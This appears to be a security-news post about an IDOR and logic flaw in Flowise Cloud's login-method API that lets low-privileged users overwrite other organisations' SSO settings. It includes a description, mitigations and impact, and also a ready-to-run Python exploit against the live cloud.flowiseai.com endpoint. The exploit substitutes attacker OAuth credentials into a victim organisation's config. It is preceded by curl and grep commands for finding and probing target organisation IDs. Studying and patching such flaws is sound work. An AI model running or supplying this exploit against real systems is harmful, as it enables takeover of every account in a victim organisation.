Listen to this Post
The vulnerability is an Insecure Direct Object Reference (IDOR) combined with a Business Logic Flaw in the `PUT /api/v1/loginmethod` endpoint of Flowise. While the endpoint requires authentication, it completely fails to validate if the authenticated user owns or has administrative rights over the target `organizationId` provided in the request body. The backend accepts the `organizationId` parameter from the JSON body and directly updates the database record corresponding to that ID. There is no middleware or logic check to ensure request.user.organizationId === body.organizationId. This allows any low-privileged user, including those on the “Free” plan, to overwrite the SSO configuration of any other organization. An attacker can replace a victim organization’s legitimate OAuth credentials (e.g., Google Client ID) with their own malicious credentials. When victim employees attempt to log in via SSO, they are authenticated against the attacker’s application, leading to full account takeover. Additionally, this flaw lets free-tier users illicitly enable “Enterprise-only” SSO features without a valid license.
DailyCVE Form:
Platform: Flowise Cloud
Version: Unspecified
Vulnerability: IDOR + LogicFlaw
Severity: Critical
Date: Not specified
Prediction: Patch unknown
What Undercode Say:
Analytics:
Identify organization IDs via user enumeration or API response leakage
grep -oP '"organizationId":"[a-f0-9-]+"' response.json | sort -u
Check if your JWT token allows modifying other orgs
curl -X PUT https://cloud.flowiseai.com/api/v1/loginmethod -H "Cookie: token=<YOUR_JWT>" -H "Content-Type: application/json" -d '{"organizationId":"victim-org-id","userId":"victim-user-id","providers":[]}' -v
Exploit:
import requests
target = "https://cloud.flowiseai.com"
attacker_jwt = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..." Low-privilege token
victim_org_id = "bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d"
victim_user_id = "6ab311fa-0d0a-4bd6-996e-4ae721377fb2"
Malicious OAuth app controlled by attacker
payload = {
"organizationId": victim_org_id,
"userId": victim_user_id,
"providers": [
{
"providerLabel": "Google",
"providerName": "google",
"config": {
"clientID": "ATTACKER_MALICIOUS_CLIENT_ID",
"clientSecret": "ATTACKER_MALICIOUS_SECRET"
},
"status": "enable"
}
]
}
headers = {
"Cookie": f"token={attacker_jwt}",
"Content-Type": "application/json"
}
response = requests.put(f"{target}/api/v1/loginmethod", json=payload, headers=headers)
print(f"Status: {response.status_code}")
print(f"Response: {response.text}")
Protection from this CVE:
- Implement ownership validation: verify `request.user.organizationId` matches `body.organizationId` before any update.
- Enforce role-based access control (RBAC) to ensure only admins can modify organization settings.
- Add server-side checks for license tier before enabling paid features.
- Log all configuration changes for audit trails.
- Upgrade to latest patched version when available.
Impact:
- Account Takeover: Attacker can hijack all employee logins via rogue SSO.
- Data Breach: Unauthorized access to victim organization’s internal systems.
- Privilege Escalation: Free users bypass license restrictions.
- Business Disruption: Legitimate SSO becomes unusable, blocking employee access.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
